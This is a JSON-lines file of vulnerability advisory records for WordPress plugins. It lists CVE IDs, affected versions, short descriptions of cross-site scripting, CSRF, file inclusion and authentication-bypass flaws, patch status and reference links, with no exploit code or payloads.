{"CVE_ID":"CVE-2024-5215","slug":"ht-mega-for-elementor","versionImpact":"2.5.5","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple widgets in all versions up to, and including, 2.5.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86dfdc4f-1cc2-4b0d-b79c-bee3d6956eb4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86dfdc4f-1cc2-4b0d-b79c-bee3d6956eb4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/htmega_videoplayer.php#L520\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/htmega_videoplayer.php#L520\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/htmega_user_login_form.php#L1961\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/htmega_user_login_form.php#L1961\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/htmega_user_register_form.php#L2910\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/htmega_user_register_form.php#L2910\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3106524\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3106524\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ht-mega-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ht-mega-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7817","slug":"misiek-photo-album","versionImpact":"1.4.3","description":"The Misiek Photo Album WordPress plugin through 1.4.3 does not have CSRF checks in some places, which could allow attackers to make logged in users delete arbitrary albums via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ab09e5a3-f5ea-479f-be2d-366f8707775e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ab09e5a3-f5ea-479f-be2d-366f8707775e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-47638","slug":"meeting-scheduler-by-vcita","versionImpact":"4.4.6","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in vCita Online Booking & Scheduling Calendar for WordPress by vcita allows Reflected XSS. This issue affects Online Booking & Scheduling Calendar for WordPress by vcita: from n\/a through 4.4.6.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/meeting-scheduler-by-vcita\\\/wordpress-online-booking-scheduling-calendar-for-wordpress-plugin-4-4-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/meeting-scheduler-by-vcita\\\/wordpress-online-booking-scheduling-calendar-for-wordpress-plugin-4-4-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12523","slug":"ymc-states-map","versionImpact":"2.4.2","description":"The States Map US plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'states_map' shortcode in all versions up to, and including, 2.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ymc-states-map\\\/trunk\\\/includes\\\/frontend\\\/Shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ymc-states-map\\\/trunk\\\/includes\\\/frontend\\\/Shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ymc-states-map\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ymc-states-map\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bdd07160-721b-4807-a227-72cd91faef39?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bdd07160-721b-4807-a227-72cd91faef39?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12291","slug":"viewmedica","versionImpact":"1.4.15","description":"The ViewMedica 9 plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4.15. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/viewmedica\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/viewmedica\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/646ba700-28d5-455f-88de-2864ef8f202c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/646ba700-28d5-455f-88de-2864ef8f202c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13222","slug":"user-messages","versionImpact":"1.2.4","description":"The User Messages WordPress plugin through 1.2.4 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/069e1f81-448d-4d27-b288-87111dade2f2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/069e1f81-448d-4d27-b288-87111dade2f2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0916","slug":"yaysmtp","description":"The YaySMTP and Email Logs: Amazon SES, SendGrid, Outlook, Mailgun, Brevo, Google and Any SMTP Service plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions 2.4.9 to 2.6.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Note: The vulnerability has been initially patched in version 2.4.8 and was reintroduced in version 2.4.9 with the removal of the wp_kses_post() built-in WordPress sanitization function.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yaysmtp\\\/trunk\\\/includes\\\/Functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yaysmtp\\\/trunk\\\/includes\\\/Functions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yaysmtp\\\/trunk\\\/includes\\\/Helper\\\/Utils.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yaysmtp\\\/trunk\\\/includes\\\/Helper\\\/Utils.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3238172\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3238172\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yaysmtp\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yaysmtp\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/209019bd-b214-4389-a972-42e38d501203?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/209019bd-b214-4389-a972-42e38d501203?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12815","slug":"point-maker","versionImpact":"0.1.6","description":"The Point Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'point_maker' shortcode in all versions up to, and including, 0.1.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/point-maker\\\/trunk\\\/shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/point-maker\\\/trunk\\\/shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/point-maker\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/point-maker\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4a46d4c-3f03-4d41-8382-b43a02b59cb2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4a46d4c-3f03-4d41-8382-b43a02b59cb2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2510","slug":"frndzk-expandable-bottom-bar","versionImpact":"1.0","description":"The Frndzk Expandable Bottom Bar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'text' parameter in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/frndzk-expandable-bottom-bar\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/frndzk-expandable-bottom-bar\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4261c81e-13a2-4022-8048-aeb0ea4e9ee4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4261c81e-13a2-4022-8048-aeb0ea4e9ee4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-23677","slug":"gtmetrix-for-wordpress","versionImpact":"0.4.5","description":"Reflected Cross-Site Scripting (XSS) vulnerability in GTmetrix GTmetrix for WordPress plugin <= 0.4.5 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/gtmetrix-for-wordpress\\\/wordpress-gtmetrix-for-wordpress-plugin-0-4-5-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/gtmetrix-for-wordpress\\\/wordpress-gtmetrix-for-wordpress-plugin-0-4-5-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2436","slug":"blog-in-blog","versionImpact":"1.1.1","description":"The Blog-in-Blog plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'blog_in_blog' shortcode in versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with editor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blog-in-blog\\\/tags\\\/1.1.1\\\/blog-in-blog.php#L257\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blog-in-blog\\\/tags\\\/1.1.1\\\/blog-in-blog.php#L257\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c6a88c3-18b7-470f-8014-373ead66dcfa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c6a88c3-18b7-470f-8014-373ead66dcfa?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-22304","slug":"freshmail-integration","versionImpact":"2.3.2","description":"Cross-Site Request Forgery (CSRF) vulnerability in Borbis Media FreshMail For WordPress. This issue affects FreshMail For WordPress: from n\/a through 2.3.2.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/freshmail-integration\\\/wordpress-freshmail-for-wordpress-plugin-2-3-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/freshmail-integration\\\/wordpress-freshmail-for-wordpress-plugin-2-3-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1171","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.8","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Filterable Gallery Widget in all versions up to, and including, 5.9.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fafdd087-9637-41df-bc5a-97e1a02ea744?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fafdd087-9637-41df-bc5a-97e1a02ea744?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034127\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Filterable_Gallery.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034127\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Filterable_Gallery.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1348","slug":"auxin-elements","versionImpact":"2.15.5","description":"The Shortcodes and extra features for Phlox theme plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom JS parameter in all versions up to, and including, 2.15.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e9324ba-1cbf-4326-80b5-7b9d969441ad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e9324ba-1cbf-4326-80b5-7b9d969441ad?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/trunk\\\/includes\\\/general-hooks.php#L1928\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/trunk\\\/includes\\\/general-hooks.php#L1928\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4780","slug":"image-hover-effects-addon-for-elementor","versionImpact":"1.4.3","description":"The Image Hover Effects \u2013 Elementor Addon plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018eihe_link\u2019 parameter in all versions up to, and including, 1.4.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/637972a3-1936-4add-88a2-3fbafba4b5c8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/637972a3-1936-4add-88a2-3fbafba4b5c8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-hover-effects-addon-for-elementor\\\/tags\\\/1.4.3\\\/includes\\\/widgets.php#L529\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-hover-effects-addon-for-elementor\\\/tags\\\/1.4.3\\\/includes\\\/widgets.php#L529\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3117113\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3117113\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/image-hover-effects-addon-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/image-hover-effects-addon-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7816","slug":"gixaw-chat","versionImpact":"1.0","description":"The Gixaw Chat WordPress plugin through 1.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f610c4a5-ccde-4305-93e0-3c6f50c741ee\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f610c4a5-ccde-4305-93e0-3c6f50c741ee\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-44018","slug":"instant-chat-wp","versionImpact":"1.0.5","description":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Istmo Plugins Instant Chat Floating Button for WordPress Websites allows PHP Local File Inclusion. This issue affects Instant Chat Floating Button for WordPress Websites: from n\/a through 1.0.5.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/instant-chat-wp\\\/wordpress-instant-chat-wp-plugin-1-0-5-local-file-inclusion-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/instant-chat-wp\\\/wordpress-instant-chat-wp-plugin-1-0-5-local-file-inclusion-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12517","slug":"woo-cart-count-shortcode","versionImpact":"1.0.4","description":"The WooCommerce Cart Count Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'cart_button' shortcode in all versions up to, and including, 1.0.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-cart-count-shortcode\\\/trunk\\\/woocommerce-cart-count-shortcode.php#L79\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-cart-count-shortcode\\\/trunk\\\/woocommerce-cart-count-shortcode.php#L79\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8373938c-060a-4579-a133-d25b4d065d36?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8373938c-060a-4579-a133-d25b4d065d36?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12290","slug":"infility-global","versionImpact":"2.9.8","description":"The Infility Global plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018set_type\u2019 parameter in all versions up to, and including, 2.9.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/infility-global\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/infility-global\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6127576b-5ce2-4a3e-95de-8a2b3d90d3a0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6127576b-5ce2-4a3e-95de-8a2b3d90d3a0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13221","slug":"fantastic-elasticsearch","versionImpact":"4.1.0","description":"The Fantastic ElasticSearch WordPress plugin through 4.1.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/693f4cc4-a082-46bc-abc9-a08919f70157\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/693f4cc4-a082-46bc-abc9-a08919f70157\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11731","slug":"master-slider","versionImpact":"3.10.6","description":"The Master Slider \u2013 Responsive Touch Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ms_slider shortcode in all versions up to, and including, 3.10.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-slider\\\/tags\\\/3.10.0\\\/includes\\\/msp-shortcodes.php#L526\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-slider\\\/tags\\\/3.10.0\\\/includes\\\/msp-shortcodes.php#L526\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/master-slider\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/master-slider\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f1dcafe1-bdba-4476-bcc7-ad844da38a01?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f1dcafe1-bdba-4476-bcc7-ad844da38a01?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5190","slug":"browse-as","versionImpact":"0.2","description":"The Browse As plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 0.2. This is due to incorrect authentication checking in the 'IS_BA_Browse_As::notice' function with the 'is_ba_original_user_COOKIEHASH' cookie value. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to log in as any existing user on the site, such as an administrator, if they have access to the user id.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/browse-as\\\/tags\\\/0.2\\\/browse-as.php#L115\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/browse-as\\\/tags\\\/0.2\\\/browse-as.php#L115\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/browse-as\\\/tags\\\/0.2\\\/browse-as.php#L92\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/browse-as\\\/tags\\\/0.2\\\/browse-as.php#L92\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f5722b0-0d54-4c44-b168-a886da1077cb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f5722b0-0d54-4c44-b168-a886da1077cb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6756","slug":"ultimate-addons-for-contact-form-7","versionImpact":"3.5.21","description":"The Ultra Addons for Contact Form 7 plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's UACF7_CUSTOM_FIELDS shortcode in all versions up to, and including, 3.5.21 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-addons-for-contact-form-7\\\/tags\\\/3.5.21\\\/addons\\\/dynamic-text\\\/inc\\\/shortcode.php#L113\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-addons-for-contact-form-7\\\/tags\\\/3.5.21\\\/addons\\\/dynamic-text\\\/inc\\\/shortcode.php#L113\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3319449\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3319449\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-addons-for-contact-form-7\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-addons-for-contact-form-7\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b839658-c472-40f0-855f-7201baeb790f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b839658-c472-40f0-855f-7201baeb790f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-23670","slug":"fancy-facebook-comments","versionImpact":"1.2.10","description":"Auth. (contributor+) Cross-Site Scripting (XSS) vulnerability in Team Heateor Fancy Comments WordPress plugin <= 1.2.10 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/fancy-facebook-comments\\\/wordpress-fancy-comments-wordpress-plugin-1-2-10-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/fancy-facebook-comments\\\/wordpress-fancy-comments-wordpress-plugin-1-2-10-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
